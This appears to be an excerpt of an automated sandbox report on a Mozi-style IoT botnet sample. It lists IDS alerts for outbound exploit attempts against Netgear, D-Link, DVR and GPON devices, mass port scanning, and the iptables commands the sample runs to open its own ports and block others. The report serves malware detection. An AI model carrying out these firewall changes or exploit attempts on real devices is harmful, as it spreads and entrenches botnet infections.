              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 202.88.190.46: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.181:45563 -> 192.168.2.20:28537
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.247.172.145: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.167: -> 192.168.2.20:
              Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.210.67.167:80 -> 192.168.2.20:34316
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.34.32.117: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.212.28.148: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.238.97.92: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 64.33.158.155: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.157.131.61: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 204.148.10.26: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47742 -> 15.161.88.49:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47742 -> 15.161.88.49:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48352 -> 23.214.76.71:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48352 -> 23.214.76.71:80
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:58928 -> 103.47.16.235:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.142.196.62: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.169.237.142: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.11.2.209: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:50336 -> 178.88.225.33:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:50336 -> 178.88.225.33:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.32.88: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:48822 -> 115.160.28.65:8080
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:48822 -> 115.160.28.65:8080
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.33.139.238: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.64.229.37: -> 192.168.2.20:
              Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.218.71.141: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.220.250.219: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.45.246: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56502 -> 82.75.175.45:80
              Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56502 -> 82.75.175.45:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.157.186.236: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:48726 -> 113.161.79.231:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:48726 -> 113.161.79.231:80
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:41972 -> 15.237.62.51:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:41972 -> 15.237.62.51:80
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 100.100.104.30: -> 192.168.2.20:
              Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.158.129.246: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:54178 -> 13.249.130.85:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:54178 -> 13.249.130.85:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 147.52.1.114: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.214.251.101: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.142.100.71: -> 192.168.2.20:
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:34316 -> 23.210.67.167:80
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:37128 -> 85.214.105.212:80
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:53936 -> 81.6.188.111:80
              Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57760 -> 92.246.94.253:80
              Connects to many ports of the same IP (likely port scanning)Show sources
              Source: global trafficTCP traffic: 167.166.165.188 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 94.97.187.163 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 13.79.188.4 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 29.187.230.13 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 160.232.142.171 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 185.70.34.103 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 159.137.4.249 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 84.209.208.168 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 14.52.177.146 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 221.1.41.110 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 148.162.250.199 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 161.29.217.202 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 67.54.192.184 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 84.72.187.149 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 34.79.180.38 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 94.91.145.21 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 135.37.73.197 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 122.169.104.138 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 40.40.5.248 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 17.23.29.251 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 166.134.109.188 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 86.118.67.217 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 91.179.250.42 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 205.210.8.73 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 80.201.9.77 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 71.213.157.134 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 198.126.3.49 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 149.233.217.118 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 71.22.117.26 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 108.232.119.42 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 157.11.78.115 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 48.107.62.30 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 98.146.234.218 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 47.130.183.87 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 71.4.197.241 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 181.38.107.98 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 122.180.52.190 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 133.216.170.67 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 194.82.200.72 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 220.206.246.179 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 117.2.162.63 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 136.183.108.224 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 161.95.84.239 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 9.120.128.78 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 119.91.50.120 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 94.224.106.104 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 147.138.192.17 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 12.56.91.65 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 52.124.66.249 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 117.126.78.88 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 27.56.236.234 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 189.161.71.91 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 30.229.23.209 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 202.47.233.125 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 112.175.198.136 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 184.71.180.110 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 52.199.115.5 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 72.17.101.201 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 75.189.55.206 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 97.19.237.236 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 20.125.190.187 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 78.17.25.87 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 106.61.88.206 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 201.211.65.138 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 20.194.139.143 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 12.129.41.73 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 217.200.122.135 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 120.70.220.231 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 139.43.104.61 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 175.244.146.57 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 204.235.190.199 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 202.30.107.204 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 63.125.68.17 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 81.113.147.127 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 64.241.138.149 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 61.94.47.96 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 59.58.132.156 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 76.94.216.22 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 21.235.195.37 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 37.63.64.215 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 187.68.238.155 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 150.45.123.229 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 14.27.161.132 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 112.2.90.90 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 100.134.89.123 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 196.104.68.208 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 163.252.150.224 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 54.218.19.80 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 167.1.169.103 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 150.180.237.213 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 117.12.79.28 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 162.85.63.56 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 185.61.14.146 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 148.174.162.66 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 72.153.111.43 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 24.150.114.54 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 64.153.76.145 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 7.251.184.10 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 149.212.155.111 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 197.75.185.233 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 20.117.119.104 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 66.11.10.33 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 101.13.186.3 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 167.35.185.166 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 218.232.129.53 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 71.27.191.205 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 44.220.245.95 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 19.35.140.38 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 178.232.217.232 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 150.250.137.224 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 83.105.227.81 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 113.9.130.10 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 174.97.64.130 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 146.164.113.65 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 116.177.55.129 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 197.64.140.241 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 150.142.183.220 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 57.36.162.225 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 214.79.226.46 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 96.208.251.9 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 21.72.133.117 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 193.229.210.90 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 66.131.138.161 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 47.205.159.249 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 128.214.130.86 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 206.79.214.122 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 120.118.238.58 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 96.203.33.213 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 175.130.144.51 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 173.46.232.71 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 68.239.197.132 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 45.90.39.155 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 154.75.144.11 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 28.46.159.218 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 42.11.46.133 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 151.37.83.166 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 12.241.220.138 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 130.177.18.137 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 146.204.28.33 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 29.14.27.225 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 146.210.131.27 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 218.229.107.98 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 39.192.165.164 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 59.252.33.99 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 177.234.114.180 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 133.90.62.93 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 50.247.39.46 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 52.161.190.104 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 1.210.36.98 ports 1,2,4,5,9,49152
              Source: global trafficTCP traffic: 6.47.161.79 ports 2,5,6,8,9,52869
              Source: global trafficTCP traffic: 108.180.252.214 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 121.98.76.63 ports 1,2,3,5,7,37215
              Source: global trafficTCP traffic: 218.93.19.234 ports 1,2,4,5,9,49152
              Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
              Source: /bin/sh (PID: 4613)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4662)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4675)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4710)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4714)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4732)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4763)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4787)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4860)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4878)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4897)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4909)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4940)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4959)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4994)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 5012)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 5028)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5050)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5062)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5091)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5100)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5124)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5140)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5164)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5183)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5189)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5220)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5240)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5243)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5249)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5282)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5315)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 52228 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 52228
              Source: unknownNetwork traffic detected: HTTP traffic on port 37296 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 44712 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 7574 -> 44712
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: unknownNetwork traffic detected: HTTP traffic on port 48440 -> 7574
              Source: global trafficTCP traffic: 192.168.2.20:40496 -> 110.240.138.18:5555
              Source: global trafficTCP traffic: 192.168.2.20:36358 -> 180.242.224.123:52869
              Source: global trafficTCP traffic: 192.168.2.20:37852 -> 194.120.187.83:8443
              Source: global trafficTCP traffic: 192.168.2.20:50052 -> 17.226.218.78:81
              Source: global trafficTCP traffic: 192.168.2.20:44934 -> 167.35.185.166:49152
              Source: global trafficTCP traffic: 192.168.2.20:35334 -> 185.252.99.21:5555
              Source: global trafficTCP traffic: 192.168.2.20:58744 -> 25.17.15.19:8443
              Source: global trafficTCP traffic: 192.168.2.20:41438 -> 126.140.98.187:81
              Source: global trafficTCP traffic: 192.168.2.20:39738 -> 17.103.148.14:8080
              Source: global trafficTCP traffic: 192.168.2.20:38150 -> 173.46.232.71:37215
              Source: global trafficTCP traffic: 192.168.2.20:50488 -> 9.23.193.235:5555
              Source: global trafficTCP traffic: 192.168.2.20:59326 -> 148.8.199.238:5555
              Source: global trafficTCP traffic: 192.168.2.20:45000 -> 191.194.67.143:8080
              Source: global trafficTCP traffic: 192.168.2.20:56584 -> 191.19.130.89:5555
              Source: global trafficTCP traffic: 192.168.2.20:49578 -> 174.116.188.92:8080
              Source: global trafficTCP traffic: 192.168.2.20:54756 -> 60.49.142.109:5555
              Source: global trafficTCP traffic: 192.168.2.20:56542 -> 115.153.49.223:5555
              Source: global trafficTCP traffic: 192.168.2.20:46172 -> 175.130.144.51:52869
              Source: global trafficTCP traffic: 192.168.2.20:36110 -> 199.129.123.23:7574
              Source: global trafficTCP traffic: 192.168.2.20:33170 -> 194.70.177.118:8080
              Source: global trafficTCP traffic: 192.168.2.20:60986 -> 75.245.97.93:8443
              Source: global trafficTCP traffic: 192.168.2.20:59670 -> 76.4.181.236:81
              Source: global trafficTCP traffic: 192.168.2.20:56552 -> 89.135.205.190:8080
              Source: global trafficTCP traffic: 192.168.2.20:37612 -> 187.136.236.154:81
              Source: global trafficTCP traffic: 192.168.2.20:60946 -> 153.172.56.219:7574
              Source: global trafficTCP traffic: 192.168.2.20:38364 -> 187.68.238.155:49152
              Source: global trafficTCP traffic: 192.168.2.20:37458 -> 82.90.22.100:8443
              Source: global trafficTCP traffic: 192.168.2.20:45216 -> 105.46.196.121:5555
              Source: global trafficTCP traffic: 192.168.2.20:55078 -> 101.207.79.110:8080
              Source: global trafficTCP traffic: 192.168.2.20:56816 -> 152.131.171.80:81
              Source: global trafficTCP traffic: 192.168.2.20:38788 -> 39.230.188.152:8080
              Source: global trafficTCP traffic: 192.168.2.20:59782 -> 108.180.252.214:37215
              Source: global trafficTCP traffic: 192.168.2.20:39398 -> 146.171.127.198:7574
              Source: global trafficTCP traffic: 192.168.2.20:44620 -> 98.101.186.102:8080
              Source: global trafficTCP traffic: 192.168.2.20:46166 -> 89.54.32.71:8080
              Source: global trafficTCP traffic: 192.168.2.20:55236 -> 97.19.237.236:52869
              Source: global trafficTCP traffic: 192.168.2.20:52260 -> 139.115.248.246:7574
              Source: global trafficTCP traffic: 192.168.2.20:48110 -> 59.115.70.23:81
              Source: global trafficTCP traffic: 192.168.2.20:37350 -> 74.164.61.210:8080
              Source: global trafficTCP traffic: 192.168.2.20:38834 -> 101.154.10.135:5555
              Source: global trafficTCP traffic: 192.168.2.20:44004 -> 48.190.253.52:5555
              Source: global trafficTCP traffic: 192.168.2.20:34860 -> 100.52.110.183:81
              Source: global trafficTCP traffic: 192.168.2.20:50258 -> 195.10.66.60:7574
              Source: global trafficTCP traffic: 192.168.2.20:44108 -> 45.90.39.155:52869
              Source: global trafficTCP traffic: 192.168.2.20:39696 -> 16.78.38.159:5555
              Source: global trafficTCP traffic: 192.168.2.20:53944 -> 17.145.188.167:8080
              Source: global trafficTCP traffic: 192.168.2.20:37114 -> 116.18.170.242:8080
              Source: global trafficTCP traffic: 192.168.2.20:59380 -> 113.9.130.10:37215
              Source: global trafficTCP traffic: 192.168.2.20:43220 -> 120.130.230.100:8443
              Source: global trafficTCP traffic: 192.168.2.20:55000 -> 157.11.78.115:52869
              Source: global trafficTCP traffic: 192.168.2.20:42738 -> 160.179.191.126:8080
              Source: global trafficTCP traffic: 192.168.2.20:47834 -> 191.114.3.228:8080
              Source: global trafficTCP traffic: 192.168.2.20:40026 -> 22.151.58.160:8080
              Source: global trafficTCP traffic: 192.168.2.20:51908 -> 101.13.186.3:37215
              Source: global trafficTCP traffic: 192.168.2.20:40946 -> 12.216.98.131:5555
              Source: global trafficTCP traffic: 192.168.2.20:43972 -> 121.95.250.247:8080
